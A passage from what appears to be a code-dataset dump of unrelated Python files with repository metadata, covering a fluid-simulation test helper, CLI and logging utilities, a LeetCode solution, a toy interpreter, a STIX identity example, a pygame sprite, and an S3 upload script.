print("FAIL! Allowed "+name+" threshold "+str(curr_thresh)+", results differ by "+str(result) +" (abs) , and by "+str(resultRel)+" (rel)" )
return 1
# global var to print manta version once per test
printVersion = 1
# compare a grid, in generation mode (MANTA_GEN_TEST_DATA=1) it
# creates the data on disk, otherwise it loads the disk data,
# computes the largest per cell error, and checks whether it matches
# the allowed thresholds
#
# note, there are two thresholds:
# - the "normal" one is intended for comparing single precision calculations across different compilers
# - the "strict" one for double precision compiles (detected automatically)
# - the "grid" object can be either a Grid<T>, or a ParticleDataImpl<T> ; parent is either FluidSolver or ParticleSystem
#
def doTestGrid( file , name, parent , grid, threshold=0, thresholdStrict=0, invertResult=False, debugShowDifference=False ):
global printVersion
# both always have to given together (if not default)
if ( threshold!=0 and thresholdStrict==0 ):
print( "Error doTestGrid - give both thresholds at the same time...")
return 1
if ( threshold==0 and thresholdStrict!=0 ):
print( "Error doTestGrid - give both thresholds at the same time...")
return 1
if getVisualSetting():
print( "Visual mode, skipping data file checks" )
return 0
# handle grid types that need conversion
#print( "doTestGrid, incoming grid type :" + type(grid).__name__ + " class:"+grid._class+ " T:"+grid._T )
if ( type(grid).__name__ == "MACGrid" ):
gridTmpMac = parent.create(VecGrid)
copyMacToVec3(grid , gridTmpMac )
ret = doTestGrid( file, name, parent, gridTmpMac , threshold, thresholdStrict, invertResult, debugShowDifference)
if debugShowDifference: grid.copyFrom( gridTmpMac )
return ret
if ( type(grid).__name__ == "LevelsetGrid" ):
gridTmpLs = parent.create(RealGrid)
copyLevelsetToReal(grid , gridTmpLs )
ret = doTestGrid( file, name, parent, gridTmpLs , threshold, thresholdStrict, invertResult, debugShowDifference)
if debugShowDifference: grid.copyFrom( gridTmpLs )
return ret
# now we should only have real & vec3 grids
# sanity check data type & parent
if ( grid._class == "Grid" and parent._class != "FluidSolver" ):
print( "Error doTestGrid - pass fluid solver as parent for grids, is '"+ parent._class +"'" );
return 1
if ( grid._class == "ParticleDataImpl" and parent._class != "BasicParticleSystem" ):
print( "Error doTestGrid - pass particle system as parent for pdata" );
return 1
# create temp grid (parent can be either fluid solver or particle system)
if ( grid._class == "Grid" and grid._T == "Real" ):
compareTmpGrid = parent.create(RealGrid)
elif ( grid._class == "Grid" and grid._T == "Vec3" ):
compareTmpGrid = parent.create(VecGrid)
elif ( grid._class == "Grid" and grid._T == "int" ):
compareTmpGrid = parent.create(IntGrid)
elif ( grid._class == "ParticleDataImpl" and grid._T == "Real" ):
compareTmpGrid = parent.create(PdataReal)
elif ( grid._class == "ParticleDataImpl" and grid._T == "Vec3" ):
compareTmpGrid = parent.create(PdataVec3)
elif ( grid._class == "ParticleDataImpl" and grid._T == "int" ):
compareTmpGrid = parent.create(PdataInt)
elif ( grid._class == "Grid4d" and grid._T == "Real" ):
compareTmpGrid = parent.create(Grid4Real)
elif ( grid._class == "Grid4d" and grid._T == "int" ):
compareTmpGrid = parent.create(Grid4Int)
elif ( grid._class == "Grid4d" and grid._T == "Vec3" ):
compareTmpGrid = parent.create(Grid4Vec3)
elif ( grid._class == "Grid4d" and grid._T == "Vec4" ):
compareTmpGrid = parent.create(Grid4Vec4)
else:
print( "Error doTestGrid - unknown grid type " + type(grid).__name__+ " class:"+grid._class+ " T:"+grid._T )
return 1
genRefFiles = getGenRefFileSetting()
fname = referenceFilename( file, name )
if (genRefFiles==1):
grid.save( fname )
print( "OK! Generated reference file '" + fname + "'")
# test data generation log
if 1:
infofilename = dataDirectory(file)+"/test_data_info.txt"
text_file = open(dataDirectory(file)+"/test_data_info.txt", "a");
if printVersion:
printVersion = 0
text_file.write( "\n%s, %s\n" % (file, str(printBuildInfo())) );
text_file.write( " %s\n" % ( fname ) );
text_file.close();
return 0
else:
# give error if file doesnt exist
if( not os.path.isfile( fname ) ):
print( "Error - unable to load test file %s" % referenceFilename( file, name ) )
print("FAIL! Reference data missing..." );
return 1
compareTmpGrid.load( fname )
errVal = 1e10
if ( grid._class == "Grid" and grid._T == "Real" ):
errVal = gridMaxDiff ( grid, compareTmpGrid )
elif ( grid._class == "Grid" and grid._T == "Vec3" ):
errVal = gridMaxDiffVec3( grid, compareTmpGrid )
elif ( grid._class == "Grid" and grid._T == "int" ):
errVal = gridMaxDiffInt ( grid, compareTmpGrid )
elif ( grid._class == "ParticleDataImpl" ):
errVal = pdataMaxDiff ( grid, compareTmpGrid )
elif ( grid._class == "Grid4d" and grid._T == "Real" ):
errVal = grid4dMaxDiff ( grid, compareTmpGrid )
elif ( grid._class == "Grid4d" and grid._T == "int" ):
errVal = grid4dMaxDiffInt ( grid, compareTmpGrid )
elif ( grid._class == "Grid4d" and grid._T == "Vec3" ):
errVal = grid4dMaxDiffVec3( grid, compareTmpGrid )
elif ( grid._class == "Grid4d" and grid._T == "Vec4" ):
errVal = grid4dMaxDiffVec4( grid, compareTmpGrid )
else:
print( "Error doTestGrid - error calculation missing" )
return 1
# debug mode to return difference in source grid, warning - no error measurements possible anymore
if debugShowDifference:
print("Warning debugShowDifference active, test data invalidated for UI display")
grid.sub( compareTmpGrid )
return 0
# debug info , print min/max
if 0:
minVal1 = grid.getMin()
maxVal1 = grid.getMax()
minVal2 = compareTmpGrid.getMin()
maxVal2 = compareTmpGrid.getMax()
print( "Test "+name+" min/max curr "+str(minVal1)+" to "+str(maxVal1)+" min/max ref "+str(minVal2)+" to "+str(maxVal2) );
maxVal = grid.getMaxAbs() + 1e-15
errValRel = errVal/maxVal
# finally, compare max error to allowed threshold, and return result
return checkResult( name, errVal , errValRel, threshold , thresholdStrict, invertResult )
# ------------------------------------------------------------------------------------------
# smaller helpers (directories, global settings)
# for xl test, load test data afterwards to keep sims in sync
def doTestDataLoad( file , name, solver , grid ):
genRefFiles = getGenRefFileSetting()
if (genRefFiles!=1):
print( "Loading %s" % referenceFilename( file, name ) )
grid.load( referenceFilename( file, name ) )
# reset and generate info file with version string when in data gen mode
def doResetInfoFile( file ):
if(getGenRefFileSetting()==1):
infofilename = dataDirectory(file)+"/test_data_info.txt"
print( "Resetting test data info file "+infofilename )
text_file = open(dataDirectory(file)+"/test_data_info.txt", "w");
text_file.write( "\n%s\n\n" % (str(printBuildInfo())) );
text_file.close();
# read test data
# try to load uni file if it exists
def tryToGetSize( basename, suffix, number , appendNumber ):
if(appendNumber==True):
suffix = suffix+("_%04d" % number )
rfile = referenceFilename( basename, suffix )
#print("Trying to get grid size from " + rfile)
size = vec3(0,0,0)
if(os.path.isfile(rfile)):
size = getUniFileSize(rfile)
#print("Found " + str(size) )
return size
# configure input filenames
# try to load uni file if it exists
def tryToLoad( grid, basename, suffix, number , appendNumber , buildInfo ):
if(appendNumber==True):
suffix = suffix+("_%04d" % number )
rfile = referenceFilename( basename, suffix )
print("Trying to load " + rfile)
if(os.path.isfile(rfile)):
grid.load(rfile)
if(buildInfo==1):
printUniFileInfoString(rfile) # more detailed build info
else:
grid.clear()
return 1
| 7,720 | 0 | 133 |
0a20c06ff463c05d267ec94c8d6e0ff76393e309 | 152 | py | Python | gym_marl_reconnaissance/__init__.py | JacopoPan/gym-marl-reconnaissance | 85a4373f3ebee66b12c88a0bdd5e4e96f9606e5a | [
"MIT"
] | 4 | 2021-08-29T20:13:38.000Z | 2022-02-28T02:39:17.000Z | gym_marl_reconnaissance/__init__.py | JacopoPan/gym-marl-reconnaissance | 85a4373f3ebee66b12c88a0bdd5e4e96f9606e5a | [
"MIT"
] | 1 | 2022-02-28T02:26:04.000Z | 2022-03-22T15:30:58.000Z | gym_marl_reconnaissance/__init__.py | JacopoPan/gym-marl-reconnaissance | 85a4373f3ebee66b12c88a0bdd5e4e96f9606e5a | [
"MIT"
] | null | null | null | from gym.envs.registration import register
register(
id='recon-arena-v0',
entry_point='gym_marl_reconnaissance.envs.recon_arena:ReconArena',
)
| 21.714286 | 70 | 0.776316 | from gym.envs.registration import register
register(
id='recon-arena-v0',
entry_point='gym_marl_reconnaissance.envs.recon_arena:ReconArena',
)
| 0 | 0 | 0 |
9c220a151084c5a15cafe9c0fb7e9461558a125f | 165 | py | Python | aliyun/dns/__init__.py | getlantern/python-aliyun | 524ccdc991f952433b2636a94266d31b00823f66 | [
"Apache-2.0"
] | 38 | 2015-05-21T05:59:14.000Z | 2018-11-28T09:14:07.000Z | aliyun/dns/__init__.py | getlantern/python-aliyun | 524ccdc991f952433b2636a94266d31b00823f66 | [
"Apache-2.0"
] | 16 | 2015-03-20T17:55:41.000Z | 2018-05-15T15:09:15.000Z | aliyun/dns/__init__.py | getlantern/python-aliyun | 524ccdc991f952433b2636a94266d31b00823f66 | [
"Apache-2.0"
] | 27 | 2015-03-16T18:32:16.000Z | 2020-11-30T05:28:06.000Z | """
Aliyun ECS
==========
The following DNS API actions are nearly fully supported:
* AddDomainRecord
* DeleteDomainRecord
* DescribeDomainRecords
"""
| 15 | 57 | 0.672727 | """
Aliyun ECS
==========
The following DNS API actions are nearly fully supported:
* AddDomainRecord
* DeleteDomainRecord
* DescribeDomainRecords
"""
| 0 | 0 | 0 |
7ceb822675136513e97564061b6f57e8cccf5494 | 1,037 | py | Python | sentry_sdk/debug.py | Siecje/sentry-python | d8405491c60c5b7c3d2ec3ed97ab4bea104f4e51 | [
"BSD-2-Clause"
] | 1 | 2020-11-02T11:31:01.000Z | 2020-11-02T11:31:01.000Z | sentry_sdk/debug.py | Siecje/sentry-python | d8405491c60c5b7c3d2ec3ed97ab4bea104f4e51 | [
"BSD-2-Clause"
] | null | null | null | sentry_sdk/debug.py | Siecje/sentry-python | d8405491c60c5b7c3d2ec3ed97ab4bea104f4e51 | [
"BSD-2-Clause"
] | null | null | null | import sys
import logging
from sentry_sdk import utils
from sentry_sdk.hub import Hub
from sentry_sdk.utils import logger
from sentry_sdk.client import _client_init_debug
from logging import LogRecord
| 25.292683 | 84 | 0.711668 | import sys
import logging
from sentry_sdk import utils
from sentry_sdk.hub import Hub
from sentry_sdk.utils import logger
from sentry_sdk.client import _client_init_debug
from logging import LogRecord
class _HubBasedClientFilter(logging.Filter):
def filter(self, record):
# type: (LogRecord) -> bool
if _client_init_debug.get(False):
return True
hub = Hub.current
if hub is not None and hub.client is not None:
return hub.client.options["debug"]
return False
def init_debug_support():
if not logger.handlers:
configure_logger()
configure_debug_hub()
def configure_logger():
_handler = logging.StreamHandler(sys.stderr)
_handler.setFormatter(logging.Formatter(" [sentry] %(levelname)s: %(message)s"))
logger.addHandler(_handler)
logger.setLevel(logging.DEBUG)
logger.addFilter(_HubBasedClientFilter())
def configure_debug_hub():
def _get_debug_hub():
return Hub.current
utils._get_debug_hub = _get_debug_hub
| 690 | 23 | 118 |
600e214504ee1a81a112be83452958bb2542ebd5 | 2,117 | py | Python | intake/cli/bootstrap.py | gramhagen/intake | de4cbb5df78881dc166b1f02743d22067f2bbd78 | [
"BSD-2-Clause"
] | 578 | 2019-02-22T11:45:28.000Z | 2022-03-31T08:32:22.000Z | intake/cli/bootstrap.py | gramhagen/intake | de4cbb5df78881dc166b1f02743d22067f2bbd78 | [
"BSD-2-Clause"
] | 336 | 2019-02-21T16:24:33.000Z | 2022-03-30T09:23:53.000Z | intake/cli/bootstrap.py | gramhagen/intake | de4cbb5df78881dc166b1f02743d22067f2bbd78 | [
"BSD-2-Clause"
] | 99 | 2019-02-22T18:31:09.000Z | 2022-03-22T03:27:54.000Z | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2018, Anaconda, Inc. and Intake contributors
# All rights reserved.
#
# The full license is in the LICENSE file, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a ``main`` function to run intake commands.
'''
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import argparse
# External imports
# Intake imports
from intake import __version__
from intake.cli.util import die, nice_join
#-----------------------------------------------------------------------------
# API
#-----------------------------------------------------------------------------
def main(description, subcommands, argv):
''' Execute an intake command.
Args:
description (str) :
A description for this top-level command
subcommands (seq[SubCommand]) :
A list of subcommands to configure for argparse
argv (seq[str]) :
A list of command line arguments to process
Returns:
None
'''
if len(argv) == 1:
die("ERROR: Must specify subcommand, one of: %s" % nice_join(x.name for x in subcommands))
parser = argparse.ArgumentParser(
prog=argv[0],
description=description,
epilog="See '<command> --help' to read about a specific subcommand.")
parser.add_argument('-v', '--version', action='version', version=__version__)
subs = parser.add_subparsers(help="Sub-commands")
for cls in subcommands:
subparser = subs.add_parser(cls.name, help=cls.__doc__.strip())
subcommand = cls(parser=subparser)
subparser.set_defaults(invoke=subcommand.invoke)
args = parser.parse_args(argv[1:])
try:
return args.invoke(args) or 0 # convert None to 0
except Exception as e:
die("ERROR: " + repr(e))
| 30.242857 | 98 | 0.512518 | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2018, Anaconda, Inc. and Intake contributors
# All rights reserved.
#
# The full license is in the LICENSE file, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a ``main`` function to run intake commands.
'''
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import argparse
# External imports
# Intake imports
from intake import __version__
from intake.cli.util import die, nice_join
#-----------------------------------------------------------------------------
# API
#-----------------------------------------------------------------------------
def main(description, subcommands, argv):
''' Execute an intake command.
Args:
description (str) :
A description for this top-level command
subcommands (seq[SubCommand]) :
A list of subcommands to configure for argparse
argv (seq[str]) :
A list of command line arguments to process
Returns:
None
'''
if len(argv) == 1:
die("ERROR: Must specify subcommand, one of: %s" % nice_join(x.name for x in subcommands))
parser = argparse.ArgumentParser(
prog=argv[0],
description=description,
epilog="See '<command> --help' to read about a specific subcommand.")
parser.add_argument('-v', '--version', action='version', version=__version__)
subs = parser.add_subparsers(help="Sub-commands")
for cls in subcommands:
subparser = subs.add_parser(cls.name, help=cls.__doc__.strip())
subcommand = cls(parser=subparser)
subparser.set_defaults(invoke=subcommand.invoke)
args = parser.parse_args(argv[1:])
try:
return args.invoke(args) or 0 # convert None to 0
except Exception as e:
die("ERROR: " + repr(e))
| 0 | 0 | 0 |
4af96fc1ae5139effbf1471a3d5a99c044bf84e9 | 1,828 | py | Python | solutions/0242-valid-anagram/valid-anagram.py | iFun/Project-G | d33b3b3c7bcee64f93dc2539fd9955a27f321d96 | [
"MIT"
] | null | null | null | solutions/0242-valid-anagram/valid-anagram.py | iFun/Project-G | d33b3b3c7bcee64f93dc2539fd9955a27f321d96 | [
"MIT"
] | null | null | null | solutions/0242-valid-anagram/valid-anagram.py | iFun/Project-G | d33b3b3c7bcee64f93dc2539fd9955a27f321d96 | [
"MIT"
] | null | null | null | # Given two strings s and t , write a function to determine if t is an anagram of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your solution to such case?
#
#
# @lc app=leetcode id=242 lang=python3
#
# [242] Valid Anagram
#
# https://leetcode.com/problems/valid-anagram/description/
#
# algorithms
# Easy (52.65%)
# Likes: 751
# Dislikes: 112
# Total Accepted: 357K
# Total Submissions: 678K
# Testcase Example: '"anagram"\n"nagaram"'
#
# Given two strings s and t , write a function to determine if t is an anagram
# of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your
# solution to such case?
#
#
| 19.869565 | 97 | 0.571116 | # Given two strings s and t , write a function to determine if t is an anagram of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your solution to such case?
#
#
# @lc app=leetcode id=242 lang=python3
#
# [242] Valid Anagram
#
# https://leetcode.com/problems/valid-anagram/description/
#
# algorithms
# Easy (52.65%)
# Likes: 751
# Dislikes: 112
# Total Accepted: 357K
# Total Submissions: 678K
# Testcase Example: '"anagram"\n"nagaram"'
#
# Given two strings s and t , write a function to determine if t is an anagram
# of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your
# solution to such case?
#
#
class Solution:
def isAnagram(self, s: str, t: str) -> bool:
if len(s) != len(t):
return False
hash_map = {}
for char in s:
if char in hash_map:
hash_map[char] = hash_map[char] + 1
else:
hash_map[char] = 1
for char in t:
if char in hash_map:
hash_map[char] = hash_map[char] - 1
if hash_map[char] < 0:
print(hash_map[char])
return False
if hash_map[char] is 0:
hash_map.pop(char, None)
else:
return False
return len(hash_map) is 0
| 651 | -6 | 49 |
5b3660b9d00705aa230281fe180336f75f2007d3 | 3,568 | py | Python | interpreter/theRealLiner.py | Crain-32/Liner | 4656d086425877fbd50f23f383222cf85220012f | [
"Apache-2.0"
] | 1 | 2021-08-04T00:59:43.000Z | 2021-08-04T00:59:43.000Z | interpreter/theRealLiner.py | Crain-32/Liner | 4656d086425877fbd50f23f383222cf85220012f | [
"Apache-2.0"
] | null | null | null | interpreter/theRealLiner.py | Crain-32/Liner | 4656d086425877fbd50f23f383222cf85220012f | [
"Apache-2.0"
] | null | null | null | """
*`prin` Prints the results of all the following function, and the numeric value
of any namespace.
*`let` converts an integer into its Unicode character.
*`if` returns the highest number of two different namespaces/function
*`set` override the numeric value of a namespace, and replaces the original in duplicate cases.
*`run` Run the function at the given numeric property, if no function is there, crashes.
*`add` add two numeric properties
*`sub` subtracts two numeric properties
*`split` run two functions
"""
| 33.037037 | 95 | 0.60454 | """
*`prin` Prints the results of all the following function, and the numeric value
of any namespace.
*`let` converts an integer into its Unicode character.
*`if` returns the highest number of two different namespaces/function
*`set` override the numeric value of a namespace, and replaces the original in duplicate cases.
*`run` Run the function at the given numeric property, if no function is there, crashes.
*`add` add two numeric properties
*`sub` subtracts two numeric properties
*`split` run two functions
"""
class Liner:
def __init__(self):
self.namespaces = dict()
self.reverseLookup = dict()
self.functionLookup = dict()
self.entranceLine = ""
def addNamespace(self, namespace, numeric, function):
self.namespaces.update({namespace : numeric})
self.reverseLookup.update({numeric : namespace})
self.functionLookup.update({namespace : function})
def setEntranceLine(self, function):
self.entranceLine = function
def prin(self, function):
functs = function.split(" ")
output = ""
for func in functs:
output += str(self.runLine(func))
print(output)
def ifStatement(self, numericOne, numericTwo):
return numericOne if (numericOne > numericTwo) else numericTwo
def setNamespace(self, namespace, numeric):
if not numeric.isdigit():
numeric = self.evalLine(numeric)
self.namespaces.update({namespace : numeric})
self.reverseLookup.update({numeric : namespace})
def runFunction(self, numeric):
if not numeric.isdigit():
numeric = self.evalLine(numeric)
return self.runLine(self.functionLookup[self.reverseLookup[numeric]])
def splitOperation(self, namespaceOne, namespaceTwo):
self.runLine(self.functionLookup[namespaceOne[:-2]])
self.runLine(self.functionLookup[namespaceTwo[:-2]])
def inStatement(self):
return int(input("Number: "))
def evalLine(self, line):
if line.endswith("()"):
namespace = line.split("()")[0].strip()
return self.runLine(self.functionLookup[namespace])
elif len(line) == 0:
exit(0)
else:
return self.namespaces[line.strip()]
def start(self):
self.runLine(self.entranceLine)
def runLine(self, line):
if 'prin' in line:
self.prin(line.split("prin ")[1])
elif 'let' in line:
return chr(self.namespaces[line.split("let ")[1]])
elif 'if' in line:
args = line.split(" if ")
return self.ifStatement(args[0], args[1])
elif 'set' in line:
args = line.split("set ")[1].split(" ")
self.setNamespace(args[0], args[1])
elif 'run' in line:
return self.runFunction(line.split("run ")[1])
elif 'add' in line:
args = line.split(" add ")
first = int(self.namespaces[args[0].strip()])
second = int(self.namespaces[args[1].strip()])
return first + second
elif 'sub' in line:
args = line.split(" sub ")
first = int(self.namespaces[args[0].strip()])
second = int(self.namespaces[args[1].strip()])
return first - second
elif 'split' in line:
args = line.split(" split ")
return self.splitOperation(args[0], args[1])
elif line.strip() == 'in':
return self.inStatement()
else:
return self.evalLine(line)
| 2,713 | -9 | 346 |
8be2210037ef9e111391e66eb0f8edd82c0e78a5 | 1,095 | py | Python | recognition/recongitions.py | HermasTV/uol_face_detection_recognition | 7622fb23c31651cb25fc995bcdaabffd8f24a1a1 | [
"MIT"
] | null | null | null | recognition/recongitions.py | HermasTV/uol_face_detection_recognition | 7622fb23c31651cb25fc995bcdaabffd8f24a1a1 | [
"MIT"
] | null | null | null | recognition/recongitions.py | HermasTV/uol_face_detection_recognition | 7622fb23c31651cb25fc995bcdaabffd8f24a1a1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""detectors.py: contains face detectors modules."""
__author__ = "Ahmed Hermas"
__copyright__ = "Copyright 2022, © UOL "
__license__ = "MIT"
__version__ = "0.0.1"
__email__ = "a7medhermas@gmail.com"
import os
import torch
from cv2 import cv2
import utils
import numpy as np
from Siamese_resnet18 import myResNet
| 28.076923 | 82 | 0.673059 | #!/usr/bin/env python3
"""detectors.py: contains face detectors modules."""
__author__ = "Ahmed Hermas"
__copyright__ = "Copyright 2022, © UOL "
__license__ = "MIT"
__version__ = "0.0.1"
__email__ = "a7medhermas@gmail.com"
import os
import torch
from cv2 import cv2
import utils
import numpy as np
from Siamese_resnet18 import myResNet
class Encoder ():
def __init__(self, encoder_name):
self.encoder_name = encoder_name
def _load_vgg_encoder(self):
weights_link = "https://download.pytorch.org/models/resnet18-5c106cde.pth"
weights_path = "recognition/assets/resnet18.pth"
if not os.path.exists(weights_path):
print("path not found,Downloading model weights")
utils.download_url(weights_link,weights_path)
model = myResNet()
model.load_state_dict(torch.load(weights_path))
def euclidean_distance(a,b):
a/= np.sqrt(np.maximum(np.sum(np.square(a)),1e-10))
b/= np.sqrt(np.maximum(np.sum(np.square(b)),1e-10))
dist = np.sqrt(np.sum(np.square(a-b)))
return dist
| 645 | -4 | 115 |
ae0166d5856fe574d19d0263006e54665d49d87a | 2,825 | py | Python | examples/ciq_identity.py | saegel/python-stix | a777aafa2573d5e66233e29b1909ce178f643891 | [
"BSD-3-Clause"
] | 194 | 2015-02-20T17:52:06.000Z | 2022-03-06T07:29:08.000Z | examples/ciq_identity.py | saegel/python-stix | a777aafa2573d5e66233e29b1909ce178f643891 | [
"BSD-3-Clause"
] | 136 | 2015-01-12T05:33:35.000Z | 2022-03-12T07:41:42.000Z | examples/ciq_identity.py | saegel/python-stix | a777aafa2573d5e66233e29b1909ce178f643891 | [
"BSD-3-Clause"
] | 82 | 2015-01-05T14:46:16.000Z | 2022-03-30T06:00:45.000Z | #!/usr/bin/env python
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
"""
Description: An example of how to add CIQ Identity information to a STIX
Indicator.
"""
# stdlib
from pprint import pprint
# python-cybox
from cybox.objects.file_object import File
# python-stix
import stix.utils as utils
from stix.core import STIXPackage, STIXHeader
from stix.indicator import Indicator
import stix.extensions.identity.ciq_identity_3_0 as stix_ciq
if __name__ == '__main__':
main()
| 31.043956 | 78 | 0.722478 | #!/usr/bin/env python
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
"""
Description: An example of how to add CIQ Identity information to a STIX
Indicator.
"""
# stdlib
from pprint import pprint
# python-cybox
from cybox.objects.file_object import File
# python-stix
import stix.utils as utils
from stix.core import STIXPackage, STIXHeader
from stix.indicator import Indicator
import stix.extensions.identity.ciq_identity_3_0 as stix_ciq
def main():
# Create a CybOX File Object with a contained hash
f = File()
f.add_hash("4EC0027BEF4D7E1786A04D021FA8A67F")
# Create an Indicator with the File Hash Object created above.
indicator = Indicator()
indicator.title = "File Hash Example"
indicator.description = (
"An indicator containing a File observable with an associated hash"
)
indicator.set_producer_identity("The MITRE Corporation")
indicator.set_produced_time(utils.dates.now())
# Add The File Object to the Indicator. This will promote the CybOX Object
# to a CybOX Observable internally.
indicator.add_object(f)
# Build our STIX CIQ Identity object
party_name = stix_ciq.PartyName(
name_lines=("Foo", "Bar"),
person_names=("John Smith", "Jill Smith"),
organisation_names=("Foo Inc.", "Bar Corp.")
)
ident_spec = stix_ciq.STIXCIQIdentity3_0(party_name=party_name)
ident_spec.add_electronic_address_identifier("jsmith@example.com")
ident_spec.add_free_text_line("Demonstrating Free Text!")
ident_spec.add_contact_number("555-555-5555")
ident_spec.add_contact_number("555-555-5556")
# Build and add a CIQ Address
addr = stix_ciq.Address(
free_text_address='1234 Example Lane.',
country='USA',
administrative_area='An Admin Area'
)
ident_spec.add_address(addr)
# Build and add a nationality
nationality = stix_ciq.Country("Norway")
ident_spec.add_nationality(nationality)
identity = stix_ciq.CIQIdentity3_0Instance(specification=ident_spec)
# Set the Indicator producer identity to our CIQ Identity
indicator.set_producer_identity(identity)
# Build our STIX Package
stix_package = STIXPackage()
# Build a STIX Header and add a description
stix_header = STIXHeader()
stix_header.description = "STIX CIQ Identity Extension Example"
# Set the STIX Header on our STIX Package
stix_package.stix_header = stix_header
# Add our Indicator object. The add() method will inspect the input and
# append it to the `stix_package.indicators` collection.
stix_package.add(indicator)
# Print the XML!
print(stix_package.to_xml())
# Print a dictionary!
pprint(stix_package.to_dict())
if __name__ == '__main__':
main()
| 2,263 | 0 | 23 |
e3b7626d09367b525a8b131aacf60f75a7a8d063 | 793 | py | Python | bomb.py | eric2007/Python-game-of-bomb-finder | 2b5c80363d2d829c199fac480345e0176021882d | [
"MIT"
] | null | null | null | bomb.py | eric2007/Python-game-of-bomb-finder | 2b5c80363d2d829c199fac480345e0176021882d | [
"MIT"
] | null | null | null | bomb.py | eric2007/Python-game-of-bomb-finder | 2b5c80363d2d829c199fac480345e0176021882d | [
"MIT"
] | null | null | null | import pygame
| 30.5 | 65 | 0.554855 | import pygame
class Bomb(pygame.sprite.Sprite):
def __init__(self,color, x, y):
pygame.sprite.Sprite.__init__(self)
self.isHidden = True
self.color = color
self.image = pygame.image.load(r'empty.gif')
self.rect = self.image.get_rect()
self.rect.topleft = [x,y]
def update(self):
if not self.isHidden:
if(self.color == 'red'):
self.image = pygame.image.load(r'gif\bomb-r.gif')
else:
self.image = pygame.image.load(r'gif\bomb-b.gif')
else:
self.image = pygame.image.load(r'empty.gif')
def show(self):
self.isHidden = False
def hide(self):
self.isHidden = True
def setPos(self, x,y):
self.rect.topleft = [x,y]
| 605 | 12 | 152 |
27682f03712aaa784ac0638f01a7479a671b0930 | 1,465 | py | Python | src/s3_transfer.py | rkaahean/weather-scrape | b85a22151e19429e83e71531943bc6766b20304e | [
"Apache-2.0"
] | null | null | null | src/s3_transfer.py | rkaahean/weather-scrape | b85a22151e19429e83e71531943bc6766b20304e | [
"Apache-2.0"
] | 4 | 2020-05-07T09:31:24.000Z | 2020-05-08T06:46:13.000Z | src/s3_transfer.py | rkaahean/weather-scrape | b85a22151e19429e83e71531943bc6766b20304e | [
"Apache-2.0"
] | null | null | null | import boto3
import configparser
import logging
from datetime import datetime
from botocore.exceptions import NoCredentialsError
import os
import sys
from pathlib import Path
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from src.constants import FILE_NAME
"""
Setting up s3 destination structure.
"""
day = datetime.now()
S3_FILE_KEY = str(day.year) + '/' + str(day.month) + '/' \
+ str(day.day) + '/' + str(day.hour) + '.csv'
"""
Setting up logging.
"""
sc_log = logging.getLogger(__name__)
sc_log.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(name)s:%(message)s')
DIRECTORY = 'logs/transfer/' + str(day.year) + '/' + str(day.month) + '/' + str(day.day) + '/'
Path(DIRECTORY).mkdir(parents=True, exist_ok=True)
handler = logging.FileHandler(DIRECTORY + str(day.hour) + '.log')
sc_log.addHandler(handler)
"""
Loading in the KEYS
"""
config = configparser.ConfigParser()
config.read('config.ini')
ACCESS_KEY = config['AWS']['ACCESS_KEY']
SECRET_KEY = config['AWS']['SECRET_KEY']
"""
File related constants
"""
s3 = boto3.client('s3', aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)
try:
s3.upload_file(FILE_NAME, 'weather-scrape-bucket', S3_FILE_KEY)
sc_log.log(logging.DEBUG, "Completed S3 upload.")
except FileNotFoundError:
sc_log.exception("The file was not found.")
except NoCredentialsError:
sc_log.exception("There is an issue with the credentials.")
| 22.19697 | 94 | 0.711263 | import boto3
import configparser
import logging
from datetime import datetime
from botocore.exceptions import NoCredentialsError
import os
import sys
from pathlib import Path
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from src.constants import FILE_NAME
"""
Setting up s3 destination structure.
"""
day = datetime.now()
S3_FILE_KEY = str(day.year) + '/' + str(day.month) + '/' \
+ str(day.day) + '/' + str(day.hour) + '.csv'
"""
Setting up logging.
"""
sc_log = logging.getLogger(__name__)
sc_log.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(name)s:%(message)s')
DIRECTORY = 'logs/transfer/' + str(day.year) + '/' + str(day.month) + '/' + str(day.day) + '/'
Path(DIRECTORY).mkdir(parents=True, exist_ok=True)
handler = logging.FileHandler(DIRECTORY + str(day.hour) + '.log')
sc_log.addHandler(handler)
"""
Loading in the KEYS
"""
config = configparser.ConfigParser()
config.read('config.ini')
ACCESS_KEY = config['AWS']['ACCESS_KEY']
SECRET_KEY = config['AWS']['SECRET_KEY']
"""
File related constants
"""
s3 = boto3.client('s3', aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)
try:
s3.upload_file(FILE_NAME, 'weather-scrape-bucket', S3_FILE_KEY)
